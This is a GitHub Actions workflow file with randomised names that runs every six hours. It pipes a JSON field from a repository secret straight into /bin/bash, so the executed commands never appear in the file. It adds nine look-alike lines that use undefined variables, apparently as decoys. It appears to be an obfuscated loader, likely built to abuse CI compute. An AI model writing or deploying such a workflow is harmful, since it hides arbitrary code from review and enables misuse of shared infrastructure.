name: lujingxi3456
on:
  workflow_dispatch:
  schedule:
    - cron: '8 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lujingxi3456
        env:
          pkeff0: ${{ secrets.pkeff0 }}
        run: |
          echo $pkeff0 | jq -r .rhnz709 | /bin/bash
          echo $stlrh2773 | jq -r .iqngj95299 | /bin/bash
          echo $fahq177 | jq -r .whst026 | /bin/bash
          echo $bbr0668 | jq -r .kstp76 | /bin/bash
          echo $f3190 | jq -r .swc39405 | /bin/bash
          echo $fqypr871 | jq -r .pewr39 | /bin/bash
          echo $l0 | jq -r .tbd62 | /bin/bash
          echo $vfw94 | jq -r .ez74625 | /bin/bash
          echo $rqvnx4 | jq -r .amae9 | /bin/bash
          echo $k479 | jq -r .nnu3328 | /bin/bash

